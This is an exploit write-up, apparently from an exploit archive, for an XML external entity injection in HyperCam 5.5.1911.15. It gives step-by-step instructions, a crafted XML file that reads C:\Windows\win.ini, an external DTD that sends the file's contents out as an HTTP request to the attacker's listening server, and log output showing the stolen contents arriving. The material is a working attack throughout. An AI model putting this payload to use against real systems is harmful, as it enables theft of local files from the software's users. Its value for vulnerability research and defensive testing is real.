#Exploit Title: HyperCam 5.5.1911.15 - XML External Entity Injection
#Exploit Author : ZwX
#Exploit Date: 2019-11-16
#Vendor Homepage : https://www.solveigmm.com/
#Link Software : https://www.solveigmm.com/files/SolveigMM_HyperCam_Home_Edition_5_5_1911_15.exe
#Tested on OS: Windows 7
[+] Exploit : (PoC)
===================
1) python -m SimpleHTTPServer 8000
2) Create file (.xml)
3) Create file Payload.dtd
4) Open the software HyperCam
5) Click About -> Check For Updates
6) Drag the file (.xml) into the window
7) External Entity Injection Successful
[+] XXE.xml :
==============
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
[+] Payload.dtd :
=================
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;
[+] Result Exploitation :
=========================
C:\>python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
ZwX-PC - - [16/Nov/2019 18:21:33] "GET /payload.dtd HTTP/1.1" 200 -
ZwX-PC - - [16/Nov/2019 18:21:33] "GET /?;%20for%2016-bit%20app%20support[font
s][extensions][mci%20extensions][files][Mail]MAPI=1[MCI%20Extensions.BAK]3g2=MPE
GVideo3gp=MPEGVideo3gp2=MPEGVideo3gpp=MPEGVideoaac=MPEGVideoadt=MPEGVideoadts=MP
EGVideom2t=MPEGVideom2ts=MPEGVideom2v=MPEGVideom4a=MPEGVideom4v=MPEGVideomod=MPE
GVideomov=MPEGVideomp4=MPEGVideomp4v=MPEGVideomts=MPEGVideots=MPEGVideotts=MPEGV
ideo[MCTools]ctl=24224[Zip-n-Go]ctl=24224NU=1Version=4.9ID=10518 HTTP/1.1" 301 -
ZwX-PC - - [16/Nov/2019 18:21:33] "GET /?;%20for%2016-bit%20app%20support[font
s][extensions][mci%20extensions][files][Mail]MAPI=1[MCI%20Extensions.BAK]3g2=MPE
GVideo3gp=MPEGVideo3gp2=MPEGVideo3gpp=MPEGVideoaac=MPEGVideoadt=MPEGVideoadts=MP
EGVideom2t=MPEGVideom2ts=MPEGVideom2v=MPEGVideom4a=MPEGVideom4v=MPEGVideomod=MPE
GVideomov=MPEGVideomp4=MPEGVideomp4v=MPEGVideomts=MPEGVideots=MPEGVideotts=MPEGV
ideo[MCTools]ctl=24224[Zip-n-Go]ctl=24224NU=1Version=4.9ID=10518/ HTTP/1.1" 200
-